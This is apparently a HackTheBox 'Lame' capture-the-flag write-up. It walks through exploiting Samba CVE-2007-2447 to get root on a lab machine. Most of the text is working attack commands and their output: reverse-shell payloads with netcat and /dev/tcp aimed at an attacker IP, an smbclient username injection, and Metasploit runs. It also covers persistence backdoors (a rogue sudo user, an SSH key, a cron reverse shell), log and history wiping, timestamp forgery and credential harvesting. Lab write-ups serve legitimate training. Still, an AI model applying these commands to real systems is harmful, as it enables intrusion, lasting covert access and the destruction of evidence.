HackTheBox Lame
Writeup for HackTheBox Lame
HackTheBox Lame
Machine Synopsis
Key Exploitation Techniques:
- Samba usermap script vulnerability (CVE-2007-2447)
- Remote code execution to immediate root access
- Alternative exploitation paths analysis
Reconnaissance & Enumeration
Port Discovery
1
2
3
4
5
6
$ nmap -p- --min-rate 10000 10.10.10.3
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Service Enumeration
1
2
3
4
5
6
7
$ nmap -p 21,22,139,445 -sC -sV 10.10.10.3
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Vulnerability Research
1
2
3
4
5
$ searchsploit vsftpd 2.3.4
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/17491.rb
$ searchsploit samba 3.0.20
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution | unix/remote/16320.rb
Exploitation
Failed Attempt: vsftpd 2.3.4 Backdoor
1
2
3
4
5
6
7
$ msfconsole -q
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
Successful Exploitation: Samba CVE-2007-2447
Manual Exploitation
1
2
3
4
5
6
7
8
9
10
11
# Download the exploit
$ wget https://raw.githubusercontent.com/amriunix/CVE-2007-2447/master/usermap_script.py
# Setup netcat listener
$ nc -nlvp 1234
# Execute exploit
$ python usermap_script.py 10.10.10.3 445 10.10.14.3 1234
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !
Root Shell Access
1
2
3
4
5
6
7
8
9
10
11
12
$ nc -nlvp 1234
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.3] 34329
id
uid=0(root) gid=0(root)
cd /root
cat root.txt
1958f8c5ebfa347cc8dc6b7c35a3b132
cd /home/makis
cat user.txt
a848bb4bcd8a9651138d9cfa73d4d16e
Post-Exploitation Techniques
Persistence Methods
SSH Key Installation
1
2
3
4
5
6
7
8
9
10
# Generate SSH key pair
$ ssh-keygen -t rsa -b 2048 -f lame_key
# Install public key on target
echo "ssh-rsa AAAAB3NzaC1yc2E..." >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
chmod 700 /root/.ssh
# Test SSH access
$ ssh -i lame_key root@10.10.10.3
Backdoor User Account
1
2
3
4
# Create backdoor user with root privileges
useradd -m -s /bin/bash -G sudo backup
echo 'backup:password123' | chpasswd
echo "backup ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
Cron Job Persistence
1
2
3
4
5
# Add persistent reverse shell cron job
echo "*/5 * * * * root /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/4444 0>&1'" >> /etc/crontab
# Verify cron job
crontab -l
Defense Evasion
Log Cleanup
1
2
3
4
5
6
7
8
9
10
11
12
13
# Clear system logs
echo > /var/log/auth.log
echo > /var/log/syslog
echo > /var/log/daemon.log
# Clear Samba logs
echo > /var/log/samba/log.smbd
echo > /var/log/samba/log.nmbd
# Clear bash history
history -c
echo > /root/.bash_history
unset HISTFILE
File Timestamp Manipulation
1
2
3
# Match timestamps to system files
touch -r /bin/bash /tmp/backdoor
touch -r /etc/passwd /root/.ssh/authorized_keys
Lateral Movement Preparation
Network Discovery
1
2
3
4
5
# Discover network hosts
nmap -sn 10.10.10.0/24
# Port scanning
nmap -sS -A 10.10.10.1-254
Credential Harvesting
1
2
3
4
5
6
# Search for stored credentials
grep -r "password" /etc/ 2>/dev/null | grep -v "Binary"
find /home -name "*.txt" -o -name "*.conf" -o -name "*.xml" | xargs grep -l "password" 2>/dev/null
# Check Samba configuration
cat /etc/samba/smb.conf | grep -E "(user|pass)"
Alternative Exploitation Methods
Metasploit Module
1
2
3
4
5
6
7
8
9
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.3
msf6 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 10.10.14.3:4444
[*] Command shell session 1 opened
id
uid=0(root) gid=0(root)
Manual SMB Client Exploitation
1
2
3
# Connect using smbclient with malicious username
$ smbclient //10.10.10.3/tmp
smb: \> logon "/=`nohup nc -e /bin/sh 10.10.14.3 1337`"
This post is licensed under CC BY 4.0 by the author.